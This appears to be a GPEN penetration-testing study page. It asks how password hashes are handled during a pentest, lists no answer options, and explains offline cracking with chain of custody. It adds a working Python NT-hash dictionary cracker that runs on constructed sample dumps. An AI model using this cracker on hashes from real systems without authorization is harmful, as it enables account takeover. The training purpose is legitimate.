What is the recommended practice when handling password hashes during a pentest to avoid impacting the target system?

Study for the SANS560 GIAC Penetration Tester (GPEN) Test. Study with flashcards and multiple choice questions, each question has hints and explanations. Get ready for your exam!

Multiple Choice

What is the recommended practice when handling password hashes during a pentest to avoid impacting the target system?

Explanation:
Password hashes collected during a pentest should be copied off the target and cracked offline on a dedicated, tester-controlled workstation. Running a cracker on the target host itself consumes its CPU, memory and disk I/O, which can degrade performance or cause an outage, is likely to trip endpoint or SIEM alerting, and changes the state of a system the client may later need to investigate. Moving the hashes to your own machine keeps the target environment as close to untouched as possible, limits the risk of disruption, and leaves the original credential store unmodified, which preserves evidence and chain of custody. It also makes the analysis controlled and repeatable: record a checksum of the exported hash file when you take it, protect the copy in transit and at rest (it is live credential material), and destroy it at the end of the engagement as the rules of engagement require.

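As an added example (not part of the original study page), the script below shows the offline half of that workflow on the analyst's workstation: it fingerprints a constructed pwdump-style export so the copy taken off the target can later be shown to be unmodified, parses the `user:RID:LM:NT:::` lines, and runs a small dictionary attack against the NT hashes. The dump, user names and wordlist are all made up for the example. MD4 is implemented in pure Python because `hashlib.new("md4")` is unavailable on many OpenSSL 3 builds; NT hashes are MD4 over the UTF-16LE password.

```python
"""Offline dictionary attack against NT hashes exported from a target.

Added example for this study page, not the page's own code. SAMPLE_DUMP and
WORDLIST are constructed; nothing here touches the target system.
"""
import hashlib
import struct
from typing import Dict, Iterable, List, Tuple

# Constructed pwdump-style export (user:RID:LM hash:NT hash:::). The LM field is
# the well-known "no LM hash" value; the NT hashes are for "password" and "".
SAMPLE_DUMP = b"""Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1106:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

# Constructed wordlist; a real run would use a large list plus rules.
WORDLIST = ["letmein", "Password1", "password", "Summer2024!"]


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is missing on many OpenSSL 3 builds."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask

    bit_len = len(data) * 8
    # Pad to 56 mod 64 bytes, then append the 64-bit little-endian bit length.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, message words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, lowercase hex."""
    return _md4(password.encode("utf-16le")).hex()


def fingerprint(dump: bytes) -> str:
    """SHA-256 of the exported file, recorded at collection time for chain of custody."""
    return hashlib.sha256(dump).hexdigest()


def parse_pwdump(dump: bytes) -> List[Tuple[str, str]]:
    """Return (user, nt_hash) pairs; blank or malformed lines are skipped, not guessed at."""
    entries = []
    for raw in dump.decode("utf-8", "replace").splitlines():
        parts = raw.split(":")
        if len(parts) < 4 or len(parts[3]) != 32:
            continue
        entries.append((parts[0], parts[3].lower()))
    return entries


def crack(entries: Iterable[Tuple[str, str]], wordlist: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack: hash each candidate once and look it up against every user."""
    by_hash: Dict[str, List[str]] = {}
    for user, nt in entries:
        by_hash.setdefault(nt, []).append(user)  # shared hashes are cracked together
    cracked: Dict[str, str] = {}
    for candidate in [""] + list(wordlist):  # a blank password is always worth one guess
        for user in by_hash.get(nt_hash(candidate), []):
            cracked[user] = candidate
    return cracked


if __name__ == "__main__":
    print("dump sha256:", fingerprint(SAMPLE_DUMP))
    for user, pw in crack(parse_pwdump(SAMPLE_DUMP), WORDLIST).items():
        print(f"{user}: {pw!r}")
```

The SHA-256 taken at the top is what you compare against the copy you hand back with the report; if the two differ, the evidence was altered somewhere between the target and the analysis box. Indexing users by hash means an account that shares a password with another is found at no extra cost, and the uncracked `jdoe` entry simply stays absent from the result rather than being reported wrongly.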
